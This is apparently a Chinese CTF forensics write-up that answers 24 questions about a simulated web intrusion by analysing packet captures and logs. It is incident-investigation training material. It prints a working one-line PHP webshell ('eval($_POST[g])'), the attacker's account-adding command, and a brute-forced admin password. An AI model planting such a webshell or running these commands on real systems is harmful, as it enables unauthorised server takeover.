关卡描述:1. 网站后台登陆地址是多少?(相对路径)
首先这种确定的网站访问的都是http或者https协议,搜索http看看。关于http的就这两个信息,然后172.16.60.199出现最多,先过滤这个ip看看
这个很可能是黑客在爆破或者猜测后台路径,这里simplexue/login.php没有报出404错误,而是继续下一个地址,所以后台路径就是它了
simplexue/login.php
关卡描述:2.攻击者的ip是多少
看那个ip在爆破就行了,
202.99.27.194
3.攻击者第一次访问网站的时间是多少(时:分:秒)
确认第一次攻击时间我们可以用一个命令过滤
ip.addr==202.99.27.194 and ip.addr==172.16.60.199
答案是10:31:10
提交之后不正确,就只能是以日志为准,再去日志查看,过滤攻击者ip
答案就是10:13:19
4. 爆破出正确的后台地址之前,总共尝试爆破了多少次
过滤http格式,然后就是攻击者ip和被攻击的ip
http and ip.addr==202.99.27.194 and ip.addr==172.16.60.199
一共出现了37次,但是报错的第一次不算,所以是36次。
5.尝试暴力破解后台密码正确之前的错误次数
在数据包里面翻出来了17次
但是不正确,所以答案是以日志为准,去查看日志
可以确定爆破密码是post格式,然后路径在这个数据包也有显示就直接在日志中过滤POST /simplexue/login.php
查看结果
所以是15个。
6.利用什么帐号密码,进入的后台(用户名/密码)
在第二个数据包
这个有两个办法,他是在16次成功的就去看第十六次爆破的数据包
还可以用在数据包里面看到的时间进行时间过滤找数据包
答案检索admin123
黑客成功登录后台的时间(时:分)
关卡描述:7. 黑客成功登录后台的时间(时:分)
10:35
关卡描述:8. 通过什么方式拿到的webshell
这里开始查看数据包,第三个数据包什么也没有发现
第四个数据包
发现他执行了phpinfo(),所以在这个之前就上传了一句话木马之类的。
再查看在这之前的数据包
一句话木马。
关卡描述:9.webshell的具体地址是
再看他执行phpinfo()的数据包
http://118.194.196.232:800/uploads/jian.php就是这个
关卡描述:10.Webshell文件具体内容
就是解密出来的内容
<?php eval($_POST[g]);?>
关卡描述:11.计算机名是什么
追踪执行phpinfo口令的数据包,http格式
复制粘贴全部内容,到一个文档里面之后转换为html模式
ctrl+f开始搜索
答案是SIMPLE-W7LOIJIF
关卡描述:12. 网站的绝对路径是什么(区分大小写)
还是看这个文件
C:/phpStudy/WWW/dedecms |
关卡描述:13. 有没有禁用php函数? (有的话,请列出禁用的函数,逗号分隔;没有的话请填无)
这一题在phpinfo里面也有
前面那个单词翻译过来就是禁用函数
答案是无
关卡描述:14. webshell 下最先执行了哪两个系统命令(回答时以逗号分隔)
系统命令
所以要用system第四个数据包开始过滤
http and ip.addr==202.99.27.194
whoami,net user test test /ad
关卡描述:15. webshell是什么权限
whoami就是在问我是谁,看他的回复是什么就是什么权限。。
这个要结合上一题,就是system权限
关卡描述:16. 服务器是否开启了3389端口(是否)
继续看黑客执行的命令也没有关于端口的netstat
找到了直接追踪tcp流
ESTABLISHED是确认链接状态
所以是开放的
关卡描述:17. 系统帐号的添加时间(时:分:秒)
http and ip.addr==202.99.27.194
找黑客执行了添加用户的命令
10:43:15
关卡描述:18. 添加系统帐号的用户名
上一题内容有test
关卡描述:19. 帐户test登陆成功的时间 (时:分:秒)
这个日志文件需要windows8打开
答案是10:46:58
关卡描述:20. 上传到文件服务器shell 的时间是多少(时:分)
这题要先确定文件服务器的ip是多少,
第一个是被入侵上传shell的那只能是172.16.60.200了
可能数据包监听的是172.16.60.199的172.16.60.200的只能去查看他的日志了
ip和post上传格式,搭配上get访问给php文件,基本上可以确定就是他了
11:34
关卡描述:21. 文件服务器上webshell的文件名
上一提get访问的文件
0911345106179864.php
关卡描述:22. 下载机密文件的名称
这个还是只能查看日志
只看172.16.60.199的
就是这个simplexue.zip
关卡描述:23. 攻击者下载机密文件的时间(时:分)
上一题就有
关卡描述:24. 下载文件的内容是什么
先看日志是在什么时间下载的压缩包
可以判断是在11.37这个时间段,然后他解压了去查看流量包,在第八个包里面。
过滤黑客iphttp and ip.addr==202.99.27.194。因为他解压出来时候用的172.16.60.199这个ip会和黑客交互,但过滤172.16.60.199这个ip也没有问题
就在这个时间段慢慢看
找到了了请求压缩包的,也知道了它的名字,
然后就是这个,点击save导入到桌面里面去
答案就出来了。